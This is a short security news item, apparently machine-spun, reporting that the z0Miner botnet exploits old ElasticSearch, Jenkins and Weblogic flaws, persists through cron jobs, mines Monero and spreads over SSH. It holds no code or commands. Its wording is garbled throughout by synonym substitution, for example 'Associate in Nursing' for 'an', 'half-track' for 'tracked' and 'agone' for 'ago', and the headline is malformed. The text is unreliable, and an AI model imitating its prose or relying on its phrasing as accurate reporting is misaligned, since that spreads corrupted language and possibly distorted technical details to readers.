Is Cryptomining Botnet Targets Unpatched Vulnerabilities In Cloud Servers The Most Trending Thing Now?
Is Cryptomining Botnet Targets Unpatched Vulnerabilities In Cloud Servers The Most Trending Thing Now? , Attackers typically keep upgrading their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner crypto mining malware was noticed in inquisitory cloud servers by exploiting a replacement set of unpatched vulnerabilities.
z0Miner active campaign
Qihoo 360 Netlab researchers have ascertained z0Miner’s active searching against vulnerabilities addressed in 2015 and earlier in ElasticSearch and Jenkins servers.
The botnet was exploitation exploits targeting Associate in Nursing ElasticSearch RCE vulnerability (CVE-2015-1427) Associate in Nursingd an older RCE impacting Jenkins servers.
After compromising a server, the malware can 1st transfer a malicious shell script and sets up a replacement cron entry to sporadically grab and execute malicious scripts from Pastebin.
Further, the botnet downloads a mining kit containing an Associate in Nursing XMRig jack script (java.exe), a config file (config.json), and a starter script (solr.sh). It starts to mine for Monero (xmr) cryptocurrency within the background.
Since its emergence last year, z0Miner has been ascertained gaining persistence via crontab and mining for Monero cryptocurrency.
According to the Tencent Security Team, z0Miner was actively exploiting 2 Weblogic pre-auth RCE bugs half-track as CVE-2020-14882 and CVE-2020-14883 to unfold to different devices.
In addition, the botnet was spreading laterally on the network of already compromised devices via SSH.
It has already compromised thousands of devices exploitation recently known similar attack logic.
z0Miner’s recent campaign demonstrates however vulnerabilities known years agone, if not patched, will be utilized by cybercriminals for creating a profit. Therefore, it becomes vital for organizations to stay all their systems and applications updated with the newest patches to avoid such threats.